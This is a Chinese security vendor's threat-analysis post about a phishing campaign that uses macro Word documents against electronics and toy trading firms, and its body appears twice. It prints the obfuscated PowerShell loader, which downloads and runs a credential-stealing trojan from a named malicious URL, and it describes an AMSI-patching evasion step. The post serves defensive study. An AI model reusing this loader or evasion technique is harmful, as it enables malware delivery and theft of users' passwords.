产品中心
产品中心
基础安全
T-Sec 主机安全
容器安全服务 TCSS
T-Sec Web应用防火墙
T-Sec 云防火墙
T-Sec 安全运营中心
T-Sec iOA零信任安全管理系统
业务安全
T-Sec 天御 验证码
T-Sec 天御 文本内容安全
T-Sec 天御 视频内容安全
T-Sec 全栈式风控引擎
T-Sec 手游安全
T-Sec 小程序安全
T-Sec 应用合规平台
数据安全
T-Sec 堡垒机
T-Sec 数据安全审计
T-Sec 云访问安全代理
T-Sec 凭据管理系统
T-Sec 密钥管理系统
T-Sec 云加密机
T-Sec 数据安全治理中心
安全服务
T-Sec 安全专家服务
一站式等保服务
T-Sec 安全托管服务
渗透测试服务
应急响应服务
重要时期安全保障服务
安全攻防对抗服务
了解全部安全产品→解决方案
解决方案
通用解决方案
等保合规安全解决方案
直播安全解决方案
数据安全解决方案
品牌保护解决方案
高防云主机安全解决方案
腾讯安心平台解决方案
行业场景方案
游戏安全场景方案
电商安全场景方案
智慧零售场景方案
智慧出行场景方案
安全专项解决方案
勒索病毒专项解决方案
重大保障安全解决方案
- NEW最新动态
更多
更多
关于我们
腾讯安全介绍
荣誉认证
帮助中心
帮助文档
考试认证
在线课堂
证书查询
联系我们
产品方案咨询
寻求市场合作
友情链接
腾讯云
未登录- 登录可以享受
- 精准服务推荐
- 线上快捷下单
- 海量资源流量
- 立即登录
威胁研究
正文
正文新年伊始,“商贸信”病毒再次攻击我国电子消费品贸易公司
2019-02-19 03:31:22
新年伊始,腾讯御见威胁情报中心再次捕获“商贸信”病毒的最新攻击样本。攻击者将带有宏病毒的word文档作为邮件附件,向消费电子产品、玩具生产销售贸易等公司发送订单咨询相关邮件,并在邮件中提示启用文档中的宏。一旦文档中的宏被点击启用,恶意宏代码会启动Powershell脚本下载假冒Teamview......
一、背景
“商贸信”病毒最早由腾讯御见情报中心于2017年12月发现,其特点为针对外贸行业的,利用带有漏洞攻击代码的Word文档伪装成采购清单、帐单等文件,通过邮件在全球外贸行业内大量传播,高峰时期仅一天时间国内就有约10万多用户收到此类钓鱼邮件。
新年伊始,腾讯御见威胁情报中心再次捕获“商贸信”病毒的最新攻击样本。攻击者将带有宏病毒的word文档作为邮件附件,向消费电子产品、玩具生产销售贸易等公司发送订单咨询相关邮件,并在邮件中提示启用文档中的宏。一旦文档中的宏被点击启用,恶意宏代码会启动Powershell脚本下载假冒Teamview的窃密木马。该木马运行后会窃取用户浏览器和 其他多款网络客户端软件保存的账号密码、每两分钟获取一次电脑桌面截图,造成企业重要信息泄露。
二、病毒通过邮件投放
根据截获的病毒攻击邮件统计,此次被攻击者主要集中在中国大陆(主要为深圳和广州)、中国香港、中国台湾,以及美国、爱尔兰、南美等多国目标。从行业来看,主要集中在消费电子产品生产销售行业和玩具生产销售行业,其次是物流公司。其中也有金融投行企业,如美国高盛集团、大都会人寿保险等。
钓鱼邮件内容如下图:
邮件内容包括运输、包装、发票等相关信息,特别强调需要确保在附件上启用“ENABLE CONTENT”,也就是启用文档附件中的宏,来增加目标中招的概率。
邮件包含带有宏病毒的文档PurchaseOrder#02_13_2019.doc,在使用office打开文档时,会提示是否启用内容,一旦启用就会导致宏病毒代码执行,导致木马被植入。
查看文档中的宏代码,发现其经过了混淆,在执行过程中会加载wscript.shell对象,准备执行环境。
继续执行会解密出powershell相关代码,随后拉起powershell.exe并传入脚本命令执行。
宏病毒代码启动Powershell.exe时附带参数信息如下:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -noprofile
function aa616 {
param($mddccb)
$k2e2b5 = 'y31898a';
$j5bbae = '';
for ($i = 0; $i -lt $mddccb.length; $i+=2) {
$t7258 = [convert]::ToByte($mddccb.Substring($i, 2), 16);
$j5bbae += [char]($t7258 -bxor $k2e2b5[($i / 2) % $k2e2b5.length]);
}
return $j5bbae;
}
$q992 = '0c4058565e18320040455d54036c73464251575f412a4a424c5c554f2b465f4c505504577a5f4c5c4a0e0960544a4f51021c400a353348141b5f585b195b0d18404218495c054006053533436c7313111819184159136a7c55542814435e4a4d1043125643565c……………………
此处省略若干行
……………………
56570c621008591c110a1018445945045d5f0c4f35565f5f4d503c50083c321918415913111819184159134c3533356b5913111819184159131118194a040d464356195e051f55500334324159131118191841043e3b45';
$q9922 = aa616($q992);
Add-Type -TypeDefinition $q9922;
[pdd954]::c47ec9();
Start-Sleep -s 1;
$p253e = $env:APPDATA;
$k9c56 = $p253e + '\\t96f4b.exe';
If (test-path $k9c56) {Remove-Item $k9c56};
$gaa1a = New-Object System.Net.WebClient;
$gaa1a.Headers['User-Agent'] = 'gaa1a';
$gaa1a.DownloadFile('http://mater.melatkinson.com/teamview.exe', $k9c56);
Start-Process -Filepath $k9c56;
部分powershell代码被加密后保存在$q992中,运行时先调用aa616()进行解密,解密后代码如下:
然后执行解密代码中的函数c47ec9(),该函数通过LoadLibrary加载amsi.dll,并获取到缓冲区恶意代码扫描函数AmsiScanBuffer地址,去除该函数地址的写保护并进行Patch操作,使该函数失效从而达到躲避检测的目的。
Powershell脚本最后从hxxp://mater.melatkinson.com/teamview.exe下载木马保存到C:\Users\****\AppData\Roaming\t96f4b.exe,并启动执行。
三、窃密木马分析
附件下载的木马teamview.exe伪装为word文档图标
同时木马的文件名伪装为远程协助软件teamview.exe(此木马并非大名鼎鼎的teamview,只是文件名假冒)
木马采用C#编写,核心代码被加密保存,运行时通过解密函数解密并通过反射机制加载。
运行后拷贝自身到C:\Users\****\AppData\Roaming\MyApp\MyApp.exe并将其添加到启动项。
分析发现teamview.exe为窃密木马,通过读取浏览器以及客户端软件配置文件、注册表信息、sqlite数据库来获取用户登录账户密码信息,同时每隔两分钟获取用户屏幕截图,并将获取到的敏感信息上传。
中招可能遭到信息泄露的包括以下程序:
Chrome
Mozilla\Firefox
Mozilla\SeaMonkey
Flock\Browser
Thunderbird
Postbox
FileZilla
CoreFTP
FTP Navigator
Opera Stable
YandexBrowser
Apple Application Support
Dragon
Comodo
Foxmail
Opera Mail
WS_FTP
FlashFXP
SmartFTP
cftp
jDownloader
窃密木马同时还会获取用户实时电脑屏幕截图,截图频率为每两分钟一次
四、安全建议
1、不要随意打开来历不明的邮件附件;
2、高度警惕附带宏代码的Office文档,除非充分信任文件来源,否则不要启用宏代码;
3、使用杀毒软件拦截可能的病毒木马攻击;
4、推荐企业采用腾讯御界高级威胁检测系统。御界高级威胁检测系统,是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。
IOCs
Md5
687e8521357d458f3ed6042695045859
eb2dab936400c38909d82f341fe70349
URL
hxxp://mater.melatkinson.com/teamview.exe
“商贸信”病毒最早由腾讯御见情报中心于2017年12月发现,其特点为针对外贸行业的,利用带有漏洞攻击代码的Word文档伪装成采购清单、帐单等文件,通过邮件在全球外贸行业内大量传播,高峰时期仅一天时间国内就有约10万多用户收到此类钓鱼邮件。
新年伊始,腾讯御见威胁情报中心再次捕获“商贸信”病毒的最新攻击样本。攻击者将带有宏病毒的word文档作为邮件附件,向消费电子产品、玩具生产销售贸易等公司发送订单咨询相关邮件,并在邮件中提示启用文档中的宏。一旦文档中的宏被点击启用,恶意宏代码会启动Powershell脚本下载假冒Teamview的窃密木马。该木马运行后会窃取用户浏览器和 其他多款网络客户端软件保存的账号密码、每两分钟获取一次电脑桌面截图,造成企业重要信息泄露。
“商贸信”变种病毒攻击流程
二、病毒通过邮件投放
根据截获的病毒攻击邮件统计,此次被攻击者主要集中在中国大陆(主要为深圳和广州)、中国香港、中国台湾,以及美国、爱尔兰、南美等多国目标。从行业来看,主要集中在消费电子产品生产销售行业和玩具生产销售行业,其次是物流公司。其中也有金融投行企业,如美国高盛集团、大都会人寿保险等。
钓鱼邮件内容如下图:
邮件内容包括运输、包装、发票等相关信息,特别强调需要确保在附件上启用“ENABLE CONTENT”,也就是启用文档附件中的宏,来增加目标中招的概率。
邮件包含带有宏病毒的文档PurchaseOrder#02_13_2019.doc,在使用office打开文档时,会提示是否启用内容,一旦启用就会导致宏病毒代码执行,导致木马被植入。
查看文档中的宏代码,发现其经过了混淆,在执行过程中会加载wscript.shell对象,准备执行环境。
继续执行会解密出powershell相关代码,随后拉起powershell.exe并传入脚本命令执行。
宏病毒代码启动Powershell.exe时附带参数信息如下:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -noprofile
function aa616 {
param($mddccb)
$k2e2b5 = 'y31898a';
$j5bbae = '';
for ($i = 0; $i -lt $mddccb.length; $i+=2) {
$t7258 = [convert]::ToByte($mddccb.Substring($i, 2), 16);
$j5bbae += [char]($t7258 -bxor $k2e2b5[($i / 2) % $k2e2b5.length]);
}
return $j5bbae;
}
$q992 = '0c4058565e18320040455d54036c73464251575f412a4a424c5c554f2b465f4c505504577a5f4c5c4a0e0960544a4f51021c400a353348141b5f585b195b0d18404218495c054006053533436c7313111819184159136a7c55542814435e4a4d1043125643565c……………………
此处省略若干行
……………………
56570c621008591c110a1018445945045d5f0c4f35565f5f4d503c50083c321918415913111819184159134c3533356b5913111819184159131118194a040d464356195e051f55500334324159131118191841043e3b45';
$q9922 = aa616($q992);
Add-Type -TypeDefinition $q9922;
[pdd954]::c47ec9();
Start-Sleep -s 1;
$p253e = $env:APPDATA;
$k9c56 = $p253e + '\\t96f4b.exe';
If (test-path $k9c56) {Remove-Item $k9c56};
$gaa1a = New-Object System.Net.WebClient;
$gaa1a.Headers['User-Agent'] = 'gaa1a';
$gaa1a.DownloadFile('http://mater.melatkinson.com/teamview.exe', $k9c56);
Start-Process -Filepath $k9c56;
部分powershell代码被加密后保存在$q992中,运行时先调用aa616()进行解密,解密后代码如下:
然后执行解密代码中的函数c47ec9(),该函数通过LoadLibrary加载amsi.dll,并获取到缓冲区恶意代码扫描函数AmsiScanBuffer地址,去除该函数地址的写保护并进行Patch操作,使该函数失效从而达到躲避检测的目的。
Powershell脚本最后从hxxp://mater.melatkinson.com/teamview.exe下载木马保存到C:\Users\****\AppData\Roaming\t96f4b.exe,并启动执行。
三、窃密木马分析
附件下载的木马teamview.exe伪装为word文档图标
同时木马的文件名伪装为远程协助软件teamview.exe(此木马并非大名鼎鼎的teamview,只是文件名假冒)
木马采用C#编写,核心代码被加密保存,运行时通过解密函数解密并通过反射机制加载。
运行后拷贝自身到C:\Users\****\AppData\Roaming\MyApp\MyApp.exe并将其添加到启动项。
分析发现teamview.exe为窃密木马,通过读取浏览器以及客户端软件配置文件、注册表信息、sqlite数据库来获取用户登录账户密码信息,同时每隔两分钟获取用户屏幕截图,并将获取到的敏感信息上传。
中招可能遭到信息泄露的包括以下程序:
Chrome
Mozilla\Firefox
Mozilla\SeaMonkey
Flock\Browser
Thunderbird
Postbox
FileZilla
CoreFTP
FTP Navigator
Opera Stable
YandexBrowser
Apple Application Support
Dragon
Comodo
Foxmail
Opera Mail
WS_FTP
FlashFXP
SmartFTP
cftp
jDownloader
窃密木马同时还会获取用户实时电脑屏幕截图,截图频率为每两分钟一次
四、安全建议
1、不要随意打开来历不明的邮件附件;
2、高度警惕附带宏代码的Office文档,除非充分信任文件来源,否则不要启用宏代码;
3、使用杀毒软件拦截可能的病毒木马攻击;
4、推荐企业采用腾讯御界高级威胁检测系统。御界高级威胁检测系统,是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。
IOCs
Md5
687e8521357d458f3ed6042695045859
eb2dab936400c38909d82f341fe70349
URL
hxxp://mater.melatkinson.com/teamview.exe
在线咨询
方案定制